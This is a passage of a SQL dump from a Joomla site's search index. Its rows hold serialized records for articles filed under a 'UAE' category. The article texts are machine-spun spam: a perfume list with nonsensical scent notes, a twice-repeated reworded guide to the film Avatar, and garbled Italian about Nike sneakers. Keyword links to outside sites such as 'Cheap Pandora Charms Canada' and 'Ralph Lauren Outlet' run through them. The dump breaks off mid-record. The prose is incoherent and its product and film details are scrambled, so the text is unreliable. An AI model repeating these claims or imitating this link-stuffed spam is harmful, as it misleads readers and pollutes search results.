User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:37:\"index.php/84-uae/136-business-pages-7\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:3:\"UAE\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:3:\"UAE\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=136\";s:5:\"route\";s:89:\"index.php?option=com_content&view=article&id=136:business-pages-7&catid=84:uae&Itemid=435\";s:5:\"title\";s:9:\"ALSHOROOQ\";s:11:\"description\";s:3879:\"10 Popular perfume Perfume is a wonderful accessory women love to wear.It\'s fantastic finish off a look or serves as a great pick me up.Here is a list of 10 popular perfumes loved by women in every location. 1.Chanel it doesn\'t.5 Chanel absolutely.5 is a preferred and classic perfume.Here first ever perfume launched by coco chanel herself.It is the most famous perfume in the world according to many and makes millions per year.This not online perfume has aldehydes, lime, ylang ylang, rose bush, jasmine, lily of the area, sandalwood, vetiver and amber loans.Ernest beaux was the chemist who created this excellent perfume that has been worn by many celebrities including marilyn monroe. Daisy is polo homepage a youthful and not too serious perfume that many ladies love.This light and fresh scent has notes of blood, violet leaving, dark red red grapefruit, gardenia, violet flower petals and leaves, jasmine flower petals and leaves, musk, vanilla flavouring and white woods.The bottle for this perfume matches the scent nicely featuring its flower top and feminine shape. 6.Ralph lauren beauty This enchantment perfume is a love story in a bottle.Wear this scent and you get many compliments from women and men.This is also the perfect gift for men to get their spouse.This classic scent has notes of sungoddess rose, marigold, cinnamon, linden oil, teal freesia, bright violet, lotus wedding plants, day lily, patchouli, oakmoss, and consequently musk.This perfume has been a favorite to many women who wear it anywhere for any special occasion. 7.Giorgio armani code fill femme This sexy perfume has amazing endurance.Many for women who live testified how this fresh and feminine scent lasts all day.Armani code pour femme has sees of blood orange, ginger herb, pear sorbet, sambac jasmine, orange floral, seringa bloom, rose honey, valuable woods complex, and vanillaflavouring.Attractive and confident when wearing this feminine scent.8.Jimmy choo Jimmy choo is a perfume that is representative of the modern woman.It has an strengthening, beautiful and irresisteble feel when worn.The scent is contains tiger orchard, pear nectar, sweet chinese orange, toffee, indonesian patchouli, and spicey chypre notes.The brand founder and chief creative officer tamara mellon created a bottle and box that represented her preferences.The bottle design was inspired by jewel colored venetian murano glass and suits the brand many crystal encrusted shoes.This confident and sexy scent is worn by a lot of women worldwide. 9.L\'air du conditions by nina ricci This floral and spicy perfume was made in france in 1948.It is an iconic perfume from the nina ricci house acquiring passion and elegance.L du temps is nina ricci most famous perfume and the scent was created by the effort of Ralph Lauren Outlet UK robert ricci and perfumer francis fabron.The scent reflects the product or service values of peace, wholesomeness, autonomy and love.This scented has notes of peach, carnation, bergamot, rosewood, peppermint, gardenia, orchid, cloves, jasmine, orris origin, eye, designer, benzoin, forest, vetiver in addition, sasalwood.This fresh and timeless scent brings out sensual charm and refinement from the wearer.10.Jean robert gaultier classique This perfume was jean paul gaultier first parfum launched in 1993.It is a woman floral oriental scent that is sensual and progressed.Jean paul gaultier is not a boring designer and he was able to bring that hallmark of himself into this perfume.This scented has notes of rum essence, rose fact, vanilla flavor orchid, daffodil, bourbon vanilla flavouring, pleasant amber, sandalwood genuine, tonka bean and emerald.As for the structure of this perfume bottle, it mimics a girly figure.Year in year out this brand re dresses the torso, packagedeals it, and sells it again as limited updates.This perfume is both elegant and classic.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2014-03-31 06:04:29\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-03-31 06:04:29\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(107,'index.php?option=com_content&view=article&id=135','index.php?option=com_content&view=article&id=135:business-pages-6&catid=84:uae&Itemid=435','GBCM','Five Cheap Pandora Charms Canada things to know for you to see \'avatar\' \"The movie avatar\"Is the big budget film by director james cameron of and fame.What you need to understand before you see it. 1.Rare skinned aliens, within the armed forces, romance a','2015-05-18 22:26:28','f222fb6cc19d78e34c538ad27528aa0b',1,1,1,'en-GB','2014-03-31 06:04:29','0000-00-00 00:00:00','2014-03-31 06:04:29','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"135\";s:5:\"alias\";s:16:\"business-pages-6\";s:7:\"summary\";s:4099:\"<p>Five <b><a title=\"Cheap Pandora Charms Canada\" href=\"http://www.milagrofilms.ca\">Cheap Pandora Charms Canada</a></b> things to know for you to see \'avatar\' <br /><br />\"The movie avatar\"Is the big budget film by director james cameron of and fame.What you need to understand before you see it.<br /><br />1.Rare skinned aliens, within the armed forces, romance and exotic settings are all area of the sci fi epic about a paraplegic ex marine who <b><a title=\"Cheap Pandora Bracelets\" href=\"http://www.milagrofilms.ca/bracelets-pandora.html\">Cheap Pandora Bracelets</a></b> starts a new life on the distant planet of pandora, find out himself battling humankind alongside the planet indigenous na race.<br /><br />2.It most current big budget film by director james cameron of and fame.Since the film cost approximately $300 million to make, you would see some pricey and spectacular special effects.The film has garnered flattering reviews from film critics.<br /><br />3.You understand the film in three different formats:In general 2d, 3d or perhaps imax 3d.Area theatres across the nation showing the film in 3d include national amusements showcase cinemas in randolph, amc cinemas in braintree, emphasize cinema de lux patriot place in foxboro and show off cinema de lux legacy place in dedham.<br /><br />4.If desire to see it in imax, you would go to either natick or reading, from the spot while the film is being shown at verizon imax 3d theater at jordan furniture.Imax screens are and positioned to maximize each audience member field of view, putting you in film production company, based on the imax corp.By thursday evening, most friday evening and weekend shows were soldout at the imax theater in natick.<br /><br />5.Many people, like boston film essenti ed symkus, formerly seen the film twice.And symkus says he plans to go a third time together along regarding his wife.Seen it in everyday 3d now twice.Ok last one.It wonderful, he explained.Director cameron has been working on the film for over a decade, symkus known.Promised a whole new ambiance to cinema with this film and he achieved it.He really scores of this movie, symkus known.Would recommend it in 3d.<br /><br />\"Character\"Is the big budget film by director james cameron of and fame.What you have to know before you see it.<br /><br />1.Light yellow skinned aliens, within the armed forces, romance and exotic settings are all perhaps the sci fi epic about a paraplegic ex marine who starts a new life on the distant planet of pandora, realize himself battling humankind alongside the planet indigenous na race.<br /><br />2.It most up-To-Date big budget film by director james cameron of and fame.Since the film cost around $300 million to make, you would see some pricey and spectacular special effects.The film has garnered convenient reviews from film critics.<br /><br />3.See the film in three different formats:In continuous 2d, 3d or perhaps imax 3d.Area theatres across the nation showing the film in 3d include national amusements showcase cinemas in randolph, amc cinemas in braintree, show cinema de lux patriot place in foxboro and accentuate cinema de lux legacy place in dedham.<br /><br />4.If your goal is to see it in imax, you should go to either natick or reading, how the film is being shown at verizon imax 3d theater at jordan furniture.Imax screens are made and positioned to maximize each audience member field of view, putting you in film production company, based on the imax corp.By thursday morning, most friday evening and weekend shows were had sold out concerts at the imax theater in natick.<br /><br />5.A lot of, like boston film essenti ed symkus, previously seen the film twice.And symkus says he plans to go a third time along with wife.Seen it in every day 3d now twice.Ok last one.It proficient, he was quoted saying.Director cameron has been working on the film for over a decade, symkus shown.Promised a whole new overall look and feeling to cinema with this film and he achieved it.He really scores utilizing movie, symkus cited.Will recommend it in 3d.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"84\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-05-19 02:26:27\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"4\";s:8:\"ordering\";s:1:\"4\";s:8:\"category\";s:3:\"UAE\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:20:\"135:business-pages-6\";s:7:\"catslug\";s:6:\"84:uae\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:37:\"index.php/84-uae/135-business-pages-6\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:3:\"UAE\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:3:\"UAE\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=135\";s:5:\"route\";s:89:\"index.php?option=com_content&view=article&id=135:business-pages-6&catid=84:uae&Itemid=435\";s:5:\"title\";s:4:\"GBCM\";s:11:\"description\";s:3758:\"Five Cheap Pandora Charms Canada things to know for you to see \'avatar\' \"The movie avatar\"Is the big budget film by director james cameron of and fame.What you need to understand before you see it. 1.Rare skinned aliens, within the armed forces, romance and exotic settings are all area of the sci fi epic about a paraplegic ex marine who Cheap Pandora Bracelets starts a new life on the distant planet of pandora, find out himself battling humankind alongside the planet indigenous na race. 2.It most current big budget film by director james cameron of and fame.Since the film cost approximately $300 million to make, you would see some pricey and spectacular special effects.The film has garnered flattering reviews from film critics. 3.You understand the film in three different formats:In general 2d, 3d or perhaps imax 3d.Area theatres across the nation showing the film in 3d include national amusements showcase cinemas in randolph, amc cinemas in braintree, emphasize cinema de lux patriot place in foxboro and show off cinema de lux legacy place in dedham. 4.If desire to see it in imax, you would go to either natick or reading, from the spot while the film is being shown at verizon imax 3d theater at jordan furniture.Imax screens are and positioned to maximize each audience member field of view, putting you in film production company, based on the imax corp.By thursday evening, most friday evening and weekend shows were soldout at the imax theater in natick. 5.Many people, like boston film essenti ed symkus, formerly seen the film twice.And symkus says he plans to go a third time together along regarding his wife.Seen it in everyday 3d now twice.Ok last one.It wonderful, he explained.Director cameron has been working on the film for over a decade, symkusknown.Promised a whole new ambiance to cinema with this film and he achieved it.He really scores of this movie, symkus known.Would recommend it in 3d. \"Character\"Is the big budget film by director james cameron of and fame.What you have to know before you see it. 1.Light yellow skinned aliens, within the armed forces, romance and exotic settings are all perhaps the sci fi epic about a paraplegic ex marine who starts a new life on the distant planet of pandora, realize himself battling humankind alongside the planet indigenous na race. 2.It most up-To-Date big budget film by director james cameron of and fame.Since the film cost around $300 million to make, you would see some pricey and spectacular special effects.The film has garnered convenient reviews from film critics. 3.See the film in three different formats:In continuous 2d, 3d or perhaps imax 3d.Area theatres across the nation showing the film in 3d include national amusements showcase cinemas in randolph, amc cinemas in braintree, show cinema de lux patriot place in foxboro and accentuate cinema de lux legacy place in dedham. 4.If your goal is to see it in imax, you should go to either natick or reading, how the film is being shown at verizon imax 3d theater at jordan furniture.Imax screens are made and positioned to maximize each audience member field of view, putting you in film production company, based on the imax corp.By thursday morning, most friday evening and weekend shows were had sold out concerts at the imax theater in natick. 5.A lot of, like boston film essenti ed symkus, previously seen the film twice.And symkus says he plans to go a third time along with wife.Seen it in every day 3d now twice.Ok last one.It proficient, he was quoted saying.Director cameron has been working on the film for over a decade, symkus shown.Promised a whole new overall look and feeling to cinema with this film and he achieved it.He really scores utilizing movie, symkus cited.Will recommend it in3d.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2014-03-31 06:04:29\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-03-31 06:04:29\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(109,'index.php?option=com_content&view=article&id=133','index.php?option=com_content&view=article&id=133:adcb-2&catid=84:uae&Itemid=435','commercial','Nike acg withinside blogbabel Nike:Sb robert rodriguez 7, sized?Roshe run \'urban safari\' put e foamposite pro \'forest/black volt\'(Foto) Vi presentiamo 3 nuovi modelli targati nike.Alcuni Ralph Lauren Polo Italia più interessanti di altri, sono fatte appos','2015-05-21 23:02:37','4a42854efd04f96d13ca6d13ebeef1a0',1,1,1,'en-GB','2014-03-31 06:04:29','0000-00-00 00:00:00','2014-03-31 06:04:29','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"133\";s:5:\"alias\";s:6:\"adcb-2\";s:7:\"summary\";s:2263:\"<p>Nike acg withinside blogbabel <br /><br />Nike:Sb robert rodriguez 7, sized?Roshe run \'urban safari\' put e foamposite pro \'forest/black volt\'(Foto)<br /><br />Vi presentiamo 3 nuovi modelli targati nike.Alcuni <b><a title=\"Ralph Lauren Polo Italia\" href=\"http://www.imespec.it\">Ralph Lauren Polo Italia</a></b> più interessanti di altri, sono fatte apposta each and every chi ama le nike incondizionatamente.<br /><br />Cominciamo con la nike frutto della collaborazione tra amount?Vitamin y nikat thelizabeth.Cuando tratta delle nuoviscuandome roshe rundella collezione rende omaggio alla divicuandoone acg, viene presentata in due contrasting colorazionidire la safari, le nuove footwear nike size?Saranno disponibili dal 14 giugno.<br /><br />Con una stampa camouflage clothing, la nike air foamposite seasoned executive \'forest/black <br /><br />12 giugno 2013 Sportydoo blogging sulle attrezzature sportive <br /><br />Stussy x nike \'s capsule catalogue <br /><br />Nike e stussy continuano a collaborare da 12 anni ed ora sono pronte a lanciare una nuova collezione adatta a tutti gli appassionati delete genere.<br /><br />Divisa in prosecute adatte anche alle strade di città.<br /><br />I materiali scelti concerning la realizzazione della collezione sono <b><a title=\"Ralph Lauren Outlet\" href=\"http://www.imespec.it\">Ralph Lauren Outlet</a></b> i migliori in possesso di nike, gna ha prodotto 3 modelli di calzature leggeri e performanti.<br /><br />Off bunch system, la nuova linea outdoor encouraged di nike, è una miscela di look e tecnologie che si avvicina al passato acg del completely.<br /><br />16 ottobre 2012 Sportydoo web log sulle attrezzature sportive <br /><br />Stussy x nike off mountain system \'s capsule chain <br /><br />A distanza di united nations anno dall\'ultima volta stussy e nike tornano a collaborare.Questa volta però il risultato non è il una collezione completa basata sulla nuova lineaoff hill system di nike.<br /><br />Off mountain / hill system è la nuova linea outdoor inspired del di ieri e di oggi che strizza l\'occhio al glorioso passato acg del brand.La collaborazione minus stussy è composta da tre.Se volete approfondire su gq c\'è un\'intervista a riguardo ai engineers nike e stussy.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"84\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-05-22 03:02:35\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"6\";s:8:\"category\";s:3:\"UAE\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:10:\"133:adcb-2\";s:7:\"catslug\";s:6:\"84:uae\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:27:\"index.php/84-uae/133-adcb-2\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:3:\"UAE\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:3:\"UAE\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=133\";s:5:\"route\";s:79:\"index.php?option=com_content&view=article&id=133:adcb-2&catid=84:uae&Itemid=435\";s:5:\"title\";s:10:\"commercial\";s:11:\"description\";s:1936:\"Nike acg withinside blogbabel Nike:Sb robert rodriguez 7, sized?Roshe run \'urban safari\' put e foamposite pro \'forest/black volt\'(Foto) Vi presentiamo 3 nuovi modelli targati nike.Alcuni Ralph Lauren Polo Italia più interessanti di altri, sono fatte apposta each and every chi ama le nike incondizionatamente. Cominciamo con la nike frutto della collaborazione tra amount?Vitamin y nikat thelizabeth.Cuando tratta delle nuoviscuandome roshe rundella collezione rende omaggio alla divicuandoone acg, viene presentata in due contrasting colorazionidire la safari, le nuove footwear nike size?Saranno disponibili dal 14 giugno. Con una stampa camouflage clothing, la nike air foamposite seasoned executive \'forest/black 12 giugno 2013 Sportydoo blogging sulle attrezzature sportive Stussy x nike \'s capsule catalogue Nike e stussy continuano a collaborare da 12 anni ed ora sono pronte a lanciare una nuova collezione adatta a tutti gli appassionati delete genere. Divisa in prosecute adatte anche alle strade di città. I materiali scelti concerning la realizzazione della collezione sono Ralph Lauren Outlet i migliori in possesso di nike, gna ha prodotto 3 modelli di calzature leggeri e performanti. Off bunch system, la nuova linea outdoor encouraged di nike, è una miscela di look e tecnologie che si avvicina al passato acg del completely. 16 ottobre 2012 Sportydoo web log sulle attrezzature sportive Stussy x nike off mountain system \'s capsule chain A distanza di united nations anno dall\'ultima volta stussy e nike tornano a collaborare.Questa volta però il risultato non è il una collezione completa basata sulla nuova lineaoff hill system di nike. Off mountain / hill system è la nuova linea outdoor inspired del di ieri edi oggi che strizza l\'occhio al glorioso passato acg del brand.La collaborazione minus stussy è composta da tre.Se volete approfondire su gq c\'è un\'intervista a riguardo ai engineers nike e stussy.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2014-03-31 06:04:29\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-03-31 06:04:29\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(110,'index.php?option=com_content&view=article&id=132','index.php?option=com_content&view=article&id=132:adcb&catid=84:uae&Itemid=435','ADCB','2007 Guide To stevegriffin Style contest PurchaSe or payment of any kind iS to be able to enter or win.Void where reStricted.A purchaSe or payment Cheap Ralph Lauren UK will not improve your oddS of winning.Legal, declare and local lawS, and provincial or','2015-05-25 22:30:54','d7d9a49808c9f03e1703f701ff5de8ad',1,1,1,'en-GB','2014-03-31 06:04:29','0000-00-00 00:00:00','2014-03-31 06:04:29','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"132\";s:5:\"alias\";s:4:\"adcb\";s:7:\"summary\";s:14760:\"<p>2007 Guide To <b><a title=\"stevegriffin\" href=\"http://www.stevegriffin.co.uk\">stevegriffin</a></b> Style contest <br /><br />PurchaSe or payment of any kind iS to be able to enter or win.Void where reStricted.A purchaSe or payment <b><a title=\"Cheap Ralph 